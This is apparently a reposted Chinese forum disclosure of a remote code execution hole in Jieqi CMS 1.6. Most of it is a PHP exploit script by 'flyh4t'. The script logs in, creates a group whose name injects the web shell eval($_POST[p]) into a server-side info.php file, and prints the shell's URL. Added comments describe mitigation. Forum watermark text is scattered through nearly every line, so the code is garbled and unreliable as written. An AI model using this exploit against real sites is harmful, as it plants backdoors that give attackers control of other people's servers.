杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
需要有一个能创建圈子的用户。
2 w$ \- i' ]8 T1 R2 C# ^0 {/ ?% F<?php; `0 X1 a: O6 X' J
8 E. m" f: _% E
// Review note (defensive analysis): this proof-of-concept, as pasted, is interleaved with
// forum watermark text on nearly every line and is not runnable in this form; it is kept
// byte-identical here for reference only.
// What it shows: after a login POST to login.php (cookie kept in cookie.txt), a multipart
// POST to modules/group/create.php sends a group name ("gname") that closes a quoted PHP
// string and appends PHP code. The "g=<id>" captured from the response is then used to
// address files/group/userdir/0/<id>/info.php, which indicates the group name is written
// into a PHP source file without escaping (inferred from the URL, not visible here).
// Mitigation: never persist user-controlled values into PHP source; keep group metadata in
// the database or a non-executable data format and deny script execution for the
// files/group/userdir tree at the web server. Detection: audit info.php files under that
// tree for eval(/$_POST fragments and alert on group names containing quotes or PHP tokens.
// Listing defects as pasted: the usage text lists three arguments but the script requires
// four ($argc < 5 with a password); the login error branch calls curl_error($ch) on a
// handle that is never assigned ($curl1 is the handle in use); and the watermark text that
// landed inside the multipart body corrupts the boundary lines.
print_r('! L; @( X8 q3 E6 E9 U) J, Q; n
+---------------------------------------------------------------------------+( W# A( d% Z6 w4 x G2 o1 X
Jieqi CMS V1.6 PHP Code Injection Exploit
- b/ [# y, c6 h- Q3 ~# m( e: w5 Zby flyh4t
8 `) b" ]! n' J: Q2 U/ ?, Rmail: phpsec at hotmail dot com$ P) ?( m6 m! }; X/ T
team: http://www.wolvez.org
" a; |/ G8 k, U: D0 k( Z4 ]+---------------------------------------------------------------------------+
2 \' {3 i$ w0 s. d- k7 m: Q$ P( _'); /**
/ }1 H. r1 v8 `% y& l * works regardless of php.ini settings
9 ^7 B* A6 D) e# x3 A*/ if ($argc < 5) { print_r('
* }' ]# q, {+ B8 A6 g6 f# Y8 z- e+---------------------------------------------------------------------------+
: C( V0 M/ _8 H0 Y/ TUsage: php '.$argv[0].' host path username
8 J" Q, \; b( c' e* whost: target server (ip/hostname)8 F" z( _; t. K6 V7 p
path: path to jieqicms
+ C$ P y( Q; l7 ^6 Uuasename: a username who can create group
% ]' {9 Y1 e1 p' N6 LExample:& J) h. `, E% J9 } a
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password! z! r& Y) W2 j. N- u8 K
+---------------------------------------------------------------------------+/ R) E* T J6 u: r' \
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961( M, B8 E5 v* V0 G- ~
Content-Disposition: form-data; name="gname": R+ X) N: N- L9 h8 t
% k2 X0 m6 ]( Q* v' \% ?& S'; $params .="';"; $params .='eval($_POST[p]);//flyh4t% y# o$ P8 i9 s0 |5 {
-----------------------------232811682799617 q( k0 k. b2 s/ s' d
Content-Disposition: form-data; name="gcatid"
5 f. X+ l% V2 @ ) I% C7 u0 R- ]4 X; X
14 E) B2 L2 X; N: ~2 d
-----------------------------232811682799611 D& P9 {# j! Z0 R3 b
Content-Disposition: form-data; name="gaudit"
+ ~5 r+ U3 o% y+ D8 J
6 Y- r& ]$ Z$ D1 |( O0 o, v, T1
! P" w% e6 P& b) ~" `-----------------------------23281168279961) C0 Z+ n7 N2 O7 }9 E, q& |/ d& U+ m
Content-Disposition: form-data; name="gbrief"
~0 W$ T+ Z( ] \! G+ h) g9 u! N + F* m0 c* E8 h7 |
18 d2 ^8 v2 [* @. Y4 M+ q6 P1 k
-----------------------------23281168279961--1 |9 T f9 w% D; K- J) N" ]; }; C$ A
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs is the returned content ob_clean(); www.2cto.com, Q& a c/ D0 ?5 Z4 I. H" r. p9 L! X
// The numeric id after "g=" in the create.php response is the only link between the
// submitted group and the file path below; that path (a .php file under the
// user-writable group directory) is the sink defenders should lock down and monitor.
* I. t" x) z Y. f) zpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |